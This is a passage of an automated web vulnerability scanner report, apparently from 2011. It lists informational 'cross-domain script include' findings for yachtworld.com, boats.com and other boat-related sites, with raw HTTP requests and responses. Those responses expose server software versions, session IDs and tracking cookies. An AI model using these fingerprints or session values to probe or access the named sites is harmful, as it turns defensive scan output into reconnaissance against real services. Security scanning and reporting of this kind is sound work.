The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

13.22. http://www.boats.com/boat-transport/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.yachtworld.com/includes/web-resources/sprint-28_2010/js/yw/referrer_tracker.js
http://www.yachtworld.com/includes/web-resources/sprint-28_2010/js/yw/yachtworld.js

Request

Response

13.23. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boatxchange.com
Path:	/pboats/browse/Make/Regulator/search.html

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /pboats/browse/Make/Regulator/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.24. http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/dynamicindex1/ddlevelsmenu/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /dynamicindex1/ddlevelsmenu/ HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:49:26 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 25724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

13.25. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381

Request

Response

13.26. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.media6degrees.com/static/nm1134.js
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js
http://e.nexac.com/e/a-1104/s-1985.js
http://edge.quantserve.com/quant.js
http://js.revsci.net/gateway/gw.js?csid=C09814
http://www.google-analytics.com/urchin.js

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:49:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: bblastvisit=1296157791; expires=Fri, 27 Jan 2012 19:49:51 GMT; path=/; domain=.reel-time.com
Set-Cookie: bblastactivity=0; expires=Fri, 27 Jan 2012 19:49:51 GMT; path=/; domain=.reel-time.com
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<![endif]-->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...


<script src="http://cdn.media6degrees.com/static/nm1134.js" type="text/javascript"></script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=C09814"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://e.nexac.com/e/a-1104/s-1985.js"></script>
...[SNIP]...

13.27. http://www.yachtworld.com/boat-content/2011/01/a-new-bertram-flagship-the-800/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-content/2011/01/a-new-bertram-flagship-the-800/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?pub=boats

Request

GET /boat-content/2011/01/a-new-bertram-flagship-the-800/ HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.yachtworld.com/boat-content/xmlrpc.php
Link: <http://www.yachtworld.com/boat-content/?p=6666>; rel=shortlink
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</span>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=boats"></script>
...[SNIP]...

13.28. http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-loans/finance/help_boatsbank.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/js/dhtmllib.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:44:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=797529CC4CDD1160056CE0F846F79790.boapp05; Path=/boat-loans
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<META http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...
<head>
<script language="JavaScript" src="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/js/dhtmllib.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js"></script>
...[SNIP]...

13.29. http://www.yachtworld.com/boat-loans/finance/rates.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-loans/finance/rates.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:44:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=9CB6B77DFE1F357C7A15A4F940F2FEA1.boapp05; Path=/boat-loans
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<META http-equiv="Content-Type" content="text/ht
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js"></script>
...[SNIP]...

13.30. http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-loans/finance/what_to_expect.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/js/dhtmllib.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:44:24 GMT
Server: Apache
Set-Cookie: JSESSIONID=734A9D1AB92AC0313D2B6E84A3195F78.boapp05; Path=/boat-loans
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<META http-equiv="Content-Type" content="t
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...
<head>
<script language="JavaScript" src="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/js/dhtmllib.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js"></script>
...[SNIP]...

13.31. http://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/js/dhtmllib.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C05D03316DAB70E7658F65FBB7FC56F.boapp00; Path=/boat-loans
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Set-Cookie: boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 20:35:27 GMT; Path=/
Set-Cookie: boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 20:35:27 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>

boat loans, yacht financing and refinancing - yachtworld.com
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>

<script language="JavaScript" src="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/js/dhtmllib.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js"></script>
...[SNIP]...

13.32. http://www.yachtworld.com/boat-loans/partner_program.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boat-loans/partner_program.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js
http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:44:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=92FC41968A40C02FF28D98A966702B9D.boapp05; Path=/boat-loans
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>Become a Boats.com Boat Loan Partner</title>
<meta name="description" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://imagesgz.boats.com/includes/web-resources/boat-loans/sprint-28_2010/css/boats.css">
<script type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/referrer_tracker.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://imagesgz.boats.com/includes/web-resources/sprint-28_2010/js/yw/s_code.js"></script>
...[SNIP]...

13.33. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The response dynamically includes the following script from another domain:

http://js.callbutton.net/callbutton.js

Request

Response

13.34. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

Issue detail

The response dynamically includes the following script from another domain:

http://js.callbutton.net/callbutton.js

Request

Response

13.35. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The response dynamically includes the following script from another domain:

http://js.callbutton.net/callbutton.js

Request

Response

13.36. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://js.callbutton.net/callbutton.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:27:30 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 21706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
</p><script language="javascript" src="http://js.callbutton.net/callbutton.js"></script>
...[SNIP]...

13.37. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/consumer_loan_processing.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js
https://www.boats.com/includes/web-resources/js/referrer_tracker.js
https://www.boats.com/includes/web-resources/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:56:42 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: JSESSIONID=132B8787464974B44186864C9F5B421F.boapp05; Path=/boat-loans; Secure
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>
My YachtWorldLoan - yachtworld.com

</title>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.boats.com/includes/web-resources/boat-loans/css/boats.css">
<script type="text/javascript" src="https://www.boats.com/includes/web-resources/js/referrer_tracker.js"></script>

<script language="JavaScript" src="https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="https://www.boats.com/includes/web-resources/js/yw/s_code.js"></script>
...[SNIP]...

13.38. https://www.yachtworld.com/boat-loans/forgot_password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/forgot_password.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js
https://www.boats.com/includes/web-resources/js/referrer_tracker.js
https://www.boats.com/includes/web-resources/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:56:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F61D5398BBCD60968135F133ABF40C44.boapp05; Path=/boat-loans; Secure
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
   <head>
       <title>
           My YachtWorldLoan - yachtworld.com

       </title>


...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.boats.com/includes/web-resources/boat-loans/css/boats.css">
<script type="text/javascript" src="https://www.boats.com/includes/web-resources/js/referrer_tracker.js"></script>

       <link rel="stylesheet" type="text/css" href="https://www.boats.com/includes/web-resources/boat-loans/css/loans.css">
       <script language="JavaScript" src="https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="https://www.boats.com/includes/web-resources/js/yw/s_code.js"></script>
...[SNIP]...

13.39. https://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js
https://www.boats.com/includes/web-resources/js/referrer_tracker.js
https://www.boats.com/includes/web-resources/js/yw/s_code.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; Path=/boat-loans; Secure
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Set-Cookie: boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
Set-Cookie: boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Keep-Alive: timeout=40, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>

boat loans, yacht financing and refinancing - yachtworld.com
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.boats.com/includes/web-resources/boat-loans/css/boats.css">
<script type="text/javascript" src="https://www.boats.com/includes/web-resources/js/referrer_tracker.js"></script>

<script language="JavaScript" src="https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="https://www.boats.com/includes/web-resources/js/yw/s_code.js"></script>
...[SNIP]...

13.40. https://www.yachtworld.com/boat-loans/myLoan.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/myLoan.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js
https://www.boats.com/includes/web-resources/js/referrer_tracker.js
https://www.boats.com/includes/web-resources/js/yw/s_code.js

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:56:36 GMT
Server: Apache
Set-Cookie: JSESSIONID=C49ADEF3AACD827887E2EE0BB766CCF9.boapp05; Path=/boat-loans; Secure
Set-Cookie: boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
   <head>
       <title>

boat loans, yacht financing and refinancing - yachtworld.com        </title>


...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.boats.com/includes/web-resources/boat-loans/css/boats.css">
<script type="text/javascript" src="https://www.boats.com/includes/web-resources/js/referrer_tracker.js"></script>

       <link rel="stylesheet" type="text/css" href="https://www.boats.com/includes/web-resources/boat-loans/css/loans.css">
       <script language="JavaScript" src="https://www.boats.com/includes/web-resources/boat-loans/js/dhtmllib.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="https://www.boats.com/includes/web-resources/js/yw/s_code.js"></script>
...[SNIP]...

14. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
